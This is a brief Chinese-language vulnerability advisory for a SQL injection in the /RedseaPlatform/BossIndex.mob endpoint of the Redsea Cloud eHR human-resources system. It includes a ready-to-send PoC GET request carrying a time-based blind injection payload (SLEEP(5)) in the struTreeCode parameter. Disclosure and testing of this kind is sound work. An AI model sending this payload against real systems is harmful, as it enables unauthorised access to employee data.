红海云eHR /RedseaPlatform/BossIndex.mob SQL 注入漏洞

2025-12-05 红海云eHR PoC Public

Description

红海云eHR 是一款企业人力资源管理系统。该漏洞存在于 /RedseaPlatform/BossIndex.mob 接口中,攻击者可以通过构造恶意的SQL语句注入,获取数据库中的敏感信息或执行任意SQL命令。

PoC

GET /RedseaPlatform/BossIndex.mob?method=getNewStaffJoin&struTreeCode='+AND+(SELECT+3266+FROM+(SELECT(SLEEP(5)))ShXk)+AND+'qmyT'='qmyT HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities